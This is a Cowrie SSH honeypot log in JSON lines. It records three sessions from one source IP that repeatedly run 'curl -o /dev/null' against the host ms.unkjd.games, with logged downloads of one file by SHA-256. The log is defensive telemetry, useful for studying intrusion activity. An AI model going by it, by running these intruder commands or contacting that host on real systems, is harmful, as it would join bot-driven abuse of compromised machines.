{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.640137Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.680437Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.681448Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.687429Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.688733Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.690233Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.692113Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.693509Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.696666Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.704798Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.707104Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.709986Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.740295Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.740982Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.742618Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.743324Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.744739Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.745651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.750064Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.752970Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.757826Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.784512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.789077Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.789787Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.793271Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.793977Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.795939Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.796344Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.829224Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.829959Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.833372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.835402Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.835844Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.836859Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.837236Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.869726Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.870752Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.871201Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.875437Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.876146Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.878361Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.879119Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.911716Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.912949Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.913401Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.918179Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.919146Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.922814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.925150Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.925941Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.954936Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.956264Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.957090Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.986487Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.987468Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.989315Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.990466Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.994261Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.024388Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.025627Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.026127Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.029783Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.032614Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.036290Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.036827Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.038047Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.038738Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.067507Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.070189Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.074973Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.075470Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.077944Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.079248Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.081238Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.081735Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.113756Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.114514Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.117379Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.118593Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.125196Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.126045Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.155881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.159723Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.160844Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.164538Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.165240Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.170181Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.171173Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
